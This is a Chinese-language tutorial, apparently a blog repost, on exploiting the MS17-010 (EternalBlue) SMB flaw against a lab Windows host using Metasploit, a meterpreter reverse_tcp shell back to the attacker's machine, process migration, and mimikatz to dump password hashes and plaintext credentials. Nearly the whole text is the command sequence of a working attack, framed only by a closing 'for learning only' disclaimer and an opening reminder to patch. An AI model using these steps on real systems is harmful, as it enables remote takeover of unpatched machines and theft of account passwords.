利用ms17-010永恒之蓝漏洞配合mimikatz获取目标主机账户密码
如何利用ms17-010永恒之蓝漏洞配合mimikatz获取目标主机账户密码永恒之蓝是2017年席卷全球的勒索软件的罪魁祸首,是微软近些年来最为严重的远程代码执行漏洞,可以直接获得系统权限,请所有IT从业人员在任何时候都要打满补丁以绝后患。
第一步:使用Nmap扫描目标主机开放端口
要知道ms17010是对445端口进行攻击的,所以我们要先对目标机进行端口扫描nmap 192.168.48.110https://img-blog.csdnimg.cn/20200507153808446.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d4aDAwMDBtbQ==,size_16,color_FFFFFF,t_70第二步:获取权限在这里我们利用ms17010(永恒之蓝)漏洞来获取靶机的权限。
运行msf,使用ms17010漏洞。msf5 > use exploit/windows/smb/ms17_010_eternalblue https://img-blog.csdnimg.cn/20200507153839177.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d4aDAwMDBtbQ==,size_16,color_FFFFFF,t_70
接下来show options查看需要配置的参数msf5 exploit(windows/smb/ms17_010_eternalblue) > show options https://img-blog.csdnimg.cn/20200507153907687.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d4aDAwMDBtbQ==,size_16,color_FFFFFF,t_70
剩下的就是需要我们设置LHOST、RHOST、payload,分别是攻击机IP、靶机IP、攻击载荷。
[*]
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.48.1//攻击机ip
[*]
lhost => 192.168.48.1
[*]
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.48.110//靶机ip
[*]
rhost => 192.168.48.110
[*]
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //攻击载荷
[*]
payload => windows/x64/meterpreter/reverse_tcp
https://img-blog.csdnimg.cn/20200507153929888.png
一切配置完毕后开始攻击msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 这里可以看到我们已经攻击成功了,拿到了靶机的shell。https://img-blog.csdnimg.cn/20200507153955697.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d4aDAwMDBtbQ==,size_16,color_FFFFFF,t_70拿到权限后先不要着急干别的,这里我们最好先进行进程迁移,确保我们的msf程序在目标机上不会受到干扰先使用ps命令查看进程meterpreter > pshttps://img-blog.csdnimg.cn/20200507154021229.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d4aDAwMDBtbQ==,size_16,color_FFFFFF,t_70
因为我们是64位操作系统,所以我们选择迁移到64位的进程上。meterpreter > migrate 516//这里的516是PID,就是进程IDhttps://img-blog.csdnimg.cn/20200507154044875.png第三步:使用mimikatz模块获取目标机明文密码使用mimikatz模块meterpreter > load mimikatzhttps://img-blog.csdnimg.cn/20200507154111247.png获取靶机密码哈希meterpreter > msvhttps://img-blog.csdnimg.cn/20200507154132121.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d4aDAwMDBtbQ==,size_16,color_FFFFFF,t_70
获取靶机明文密码meterpreter > kerberos https://img-blog.csdnimg.cn/20200507154150105.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d4aDAwMDBtbQ==,size_16,color_FFFFFF,t_70
到这里攻击就结束了,成功拿到了目标机的明文账户密码。注:本文仅供参考学习,请勿在网上搞破坏,触犯法律者应承担相应的法律责任!
页:
[1]